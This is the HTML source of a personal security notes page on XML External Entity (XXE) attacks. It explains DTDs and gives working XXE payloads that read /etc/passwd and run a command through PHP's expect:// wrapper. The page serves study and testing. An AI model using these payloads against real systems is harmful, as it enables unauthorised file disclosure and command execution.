|
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
|
|
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
|
|
.codehilite .go { color: #546E7A } /* Generic.Output */
|
|
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
|
|
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
|
|
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
|
|
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
|
|
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
|
|
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
|
|
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
|
|
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
|
|
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
|
|
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
|
|
.codehilite .ld { color: #C3E88D } /* Literal.Date */
|
|
.codehilite .m { color: #F78C6C } /* Literal.Number */
|
|
.codehilite .s { color: #C3E88D } /* Literal.String */
|
|
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
|
|
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
|
|
.codehilite .nc { color: #FFCB6B } /* Name.Class */
|
|
.codehilite .no { color: #EEFFFF } /* Name.Constant */
|
|
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
|
|
.codehilite .ni { color: #89DDFF } /* Name.Entity */
|
|
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
|
|
.codehilite .nf { color: #82AAFF } /* Name.Function */
|
|
.codehilite .nl { color: #82AAFF } /* Name.Label */
|
|
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
|
|
.codehilite .nx { color: #EEFFFF } /* Name.Other */
|
|
.codehilite .py { color: #FFCB6B } /* Name.Property */
|
|
.codehilite .nt { color: #FF5370 } /* Name.Tag */
|
|
.codehilite .nv { color: #89DDFF } /* Name.Variable */
|
|
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
|
|
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
|
|
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
|
|
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
|
|
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
|
|
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
|
|
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
|
|
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
|
|
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
|
|
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
|
|
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
|
|
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
|
|
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
|
|
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
|
|
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
|
|
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
|
|
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
|
|
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
|
|
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
|
|
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
|
|
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
|
|
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
|
|
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
|
|
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
|
|
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
|
|
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
|
|
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
|
|
<div class="column column-3">
|
|
<ul>
|
|
<li><a href="#xml-external-entity-xxe">XML External Entity (XXE)</a><ul>
|
|
<li><a href="#document-type-definition-dtd">Document Type Definition (DTD)</a></li>
|
|
<li><a href="#replacing-xml-content">Replacing XML content</a></li>
|
|
<li><a href="#tools">Tools</a></li>
|
|
</ul>
|
|
</li>
|
|
</ul>
|
|
</div>
|
|
<h1 id="xml-external-entity-xxe">XML External Entity (XXE)</h1>
|
|
<p>An XML External Entity (XXE) attack is a vulnerability that abuses features of XML parsers/data. It often allows an attacker to interact with any backend or external systems that the application itself can access and can allow the attacker to read the file on that system. They can also cause Denial of Service (DoS) attack or could use XXE to perform Server-Side Request Forgery (SSRF) inducing the web application to make requests to other applications. XXE may even enable port scanning and lead to remote code execution.</p>
|
|
<p>There are two types of XXE attacks: in-band and out-of-band (OOB-XXE).
|
|
1. An in-band XXE attack is the one in which the attacker can receive an immediate response to the XXE payload.</p>
|
|
<ol>
|
|
<li>out-of-band XXE attacks (also called blind XXE), there is no immediate response from the web application and attacker has to reflect the output of their XXE payload to some other file or their own server.</li>
|
|
</ol>
|
|
<h2 id="document-type-definition-dtd">Document Type Definition (DTD)</h2>
|
|
<p>A DTD defines the structure and the legal elements and attributes of an XML document.</p>
|
|
<ul>
|
|
<li>Example file content of <code>note.dtd</code></li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code><span class="cp"><!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)></span> <span class="cp"><!ELEMENT to (#PCDATA)></span> <span class="cp"><!ELEMENT from (#PCDATA)></span> <span class="cp"><!ELEMENT heading (#PCDATA)></span> <span class="cp"><!ELEMENT body (#PCDATA)></span> ]>
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>!DOCTYPE note - Defines a root element of the document named note</li>
|
|
<li>!ELEMENT note - Defines that the note element must contain the elements: "to, from, heading, body"</li>
|
|
<li>!ELEMENT to - Defines the <code>to</code> element to be of type "#PCDATA"</li>
|
|
<li>!ELEMENT from - Defines the <code>from</code> element to be of type "#PCDATA"</li>
|
|
<li>!ELEMENT heading - Defines the <code>heading</code> element to be of type "#PCDATA"</li>
|
|
<li>
|
|
<p>!ELEMENT body - Defines the <code>body</code> element to be of type "#PCDATA"</p>
|
|
<p>NOTE: #PCDATA means parseable character data.</p>
|
|
</li>
|
|
<li>
|
|
<p>Resulting XML doc follows</p>
|
|
</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code><span class="cp"><?xml version="1.0" encoding="UTF-8"?></span>
|
|
<span class="cp"><!DOCTYPE note SYSTEM "note.dtd"></span>
|
|
<span class="nt"><note></span>
|
|
<span class="nt"><to></span>falcon<span class="nt"></to></span>
|
|
<span class="nt"><from></span>feast<span class="nt"></from></span>
|
|
<span class="nt"><heading></span>hacking<span class="nt"></heading></span>
|
|
<span class="nt"><body></span>XXE attack<span class="nt"></body></span>
|
|
<span class="nt"></note></span>
|
|
</code></pre></div>
|
|
|
|
<h2 id="replacing-xml-content">Replacing XML content</h2>
|
|
<ul>
|
|
<li>Name in the example</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code><span class="cp"><!DOCTYPE replace [<!ENTITY name "feast"></span> ]>
|
|
<span class="nt"><userInfo></span>
|
|
<span class="nt"><firstName></span>falcon<span class="nt"></firstName></span>
|
|
<span class="nt"><lastName></span><span class="ni">&name;</span><span class="nt"></lastName></span>
|
|
<span class="nt"></userInfo></span>
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>System call inside entity</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code><span class="cp"><?xml version="1.0" encoding="UTF-8"?></span>
|
|
<span class="cp"><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'></span>]>
|
|
<span class="nt"><root></span>
|
|
<span class="nt"><name></span>sdafsa<span class="nt"></name></span>
|
|
<span class="nt"><tel></span>789731421<span class="nt"></tel></span>
|
|
<span class="nt"><email></span><span class="ni">&xxe;</span><span class="nt"></email></span>
|
|
<span class="nt"><password></span>12345<span class="nt"></password></span>
|
|
<span class="nt"></root></span>
|
|
</code></pre></div>
|
|
|
|
<div class="codehilite"><pre><span></span><code><span class="cp"><?xml version="1.0"?></span>
|
|
<span class="cp"><!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'></span>]>
|
|
<span class="nt"><root></span><span class="ni">&read;</span><span class="nt"></root></span>
|
|
</code></pre></div>
|
|
|
|
<ul>
|
|
<li>PHP expect using syscalls</li>
|
|
</ul>
|
|
<div class="codehilite"><pre><span></span><code><span class="cp"><?xml version="1.0"?></span>
|
|
<span class="cp"><!DOCTYPE foo [ <!ELEMENT foo ANY ></span>
|
|
<span class="cp"><!ENTITY xxe SYSTEM "expect://id" ></span>]>
|
|
<span class="nt"><root></span>
|
|
<span class="nt"><email></span><span class="ni">&xxe;</span><span class="nt"></email></span>
|
|
<span class="nt"><password></span>12345<span class="nt"></password></span>
|
|
<span class="nt"></root></span>
|
|
</code></pre></div>
|
|
|
|
<h2 id="tools">Tools</h2>
|
|
<ul>
|
|
<li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#classic-xxe">Payload All The Things</a></li>
|
|
</ul>
|
|
</span>
|
|
</div>
|
|
</div>
|
|
<div id="footer">
|
|
|
|
<p></p>
|
|
<center>
|
|
© Stefan Friese
|
|
</center>
|
|
|
|
</div>
|
|
|
|
<script>
|
|
function linkClick(obj) {
|
|
if (obj.open) {
|
|
console.log('open');
|
|
if (sessionStorage.getItem(obj.id) && !(sessionStorage.getItem(obj.id) === "open")) {
|
|
sessionStorage.removeItem(obj.id);
|
|
}
|
|
sessionStorage.setItem(obj.id,"open");
|
|
console.log(obj.id);
|
|
|
|
} else {
|
|
console.log('closed');
|
|
sessionStorage.removeItem(obj.id);
|
|
|
|
}
|
|
// if (obj.open) {
|
|
// console.log('open');
|
|
// if (sessionStorage.getItem("opened") && !(sessionStorage.getItem("opened") === obj.id)) {
|
|
// sessionStorage.removeItem("opened");
|
|
// }
|
|
// sessionStorage.setItem("opened", obj.id);
|
|
// console.log(obj);
|
|
|
|
// } else {
|
|
// console.log('closed');
|
|
// sessionStorage.removeItem("opened");
|
|
//
|
|
// }
|
|
}
|
|
|
|
//if ( sessionStorage.getItem("opened")) {
|
|
// var item = sessionStorage.getItem("opened")
|
|
// document.getElementById(item)['open'] = 'open';
|
|
//}
|
|
let _keys = Object.keys(sessionStorage);
|
|
if (_keys) {
|
|
for ( let i = 0; i < _keys.length; i++ ) {
|
|
document.getElementById(_keys[i])['open'] = 'open';
|
|
}
|
|
}
|
|
|
|
|
|
|
|
// const detailsElement = document.querySelector('.details-sidebar');
|
|
// detailsElement.addEventListener('toggle', event => {
|
|
// if (event.target.open) {
|
|
// console.log('open');
|
|
// if (sessionStorage.getItem("opened") && !(sessionStorage.getItem("opened") === detailsElement.id)) {
|
|
// sessionStorage.removeItem("opened");
|
|
// }
|
|
// sessionStorage.setItem("opened", detailsElement.id);
|
|
// console.log(detailsElement);
|
|
//
|
|
// } else {
|
|
// console.log('closed');
|
|
// sessionStorage.removeItem("opened");
|
|
//
|
|
// }
|
|
// });
|
|
//
|
|
// async function fetchIndexJSON() {
|
|
// const response = await fetch('/index.json');
|
|
// const index = await response.json();
|
|
// return index;
|
|
// }
|
|
// // Extract the `q` query parameter
|
|
//var queryStringRegex = /[\?&]q=([^&]+)/g;
|
|
//var matches = queryStringRegex.exec(window.location.search);
|
|
//if(matches && matches[1]) {
|
|
// var value = decodeURIComponent(matches[1].replace(/\+/g, '%20'));
|
|
//
|
|
//
|
|
// // fetchIndexJSON()
|
|
// // .then(index => { console.log(index['index']);});
|
|
// // Load the posts to search
|
|
// fetch('/index').then(function(posts) {
|
|
// // Remember to include Fuse.js before this script.
|
|
//
|
|
// var fuse = new Fuse(posts, {
|
|
// keys: ['title', 'tags', 'content'] // What we're searching
|
|
// });
|
|
//
|
|
// // Run the search
|
|
// var results = fuse.search(value);
|
|
// //console.log(results);
|
|
//
|
|
// // Generate markup for the posts, implement SearchResults however you want.
|
|
// // var $results = SearchResults(results);
|
|
//
|
|
// // Add the element to the empty <div> from before.
|
|
//// $('#searchResults').append($results);
|
|
// });
|
|
//}
|
|
</script>
|
|
|
|
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js"></script>
|
|
<script src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
|
|
</script>
|
|
<script type="text/x-mathjax-config">
|
|
MathJax.Hub.Config({
|
|
config: ["MMLorHTML.js"],
|
|
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
|
|
extensions: ["MathMenu.js", "MathZoom.js"]
|
|
});
|
|
</script>
|
|
</body>
|
|
</html> |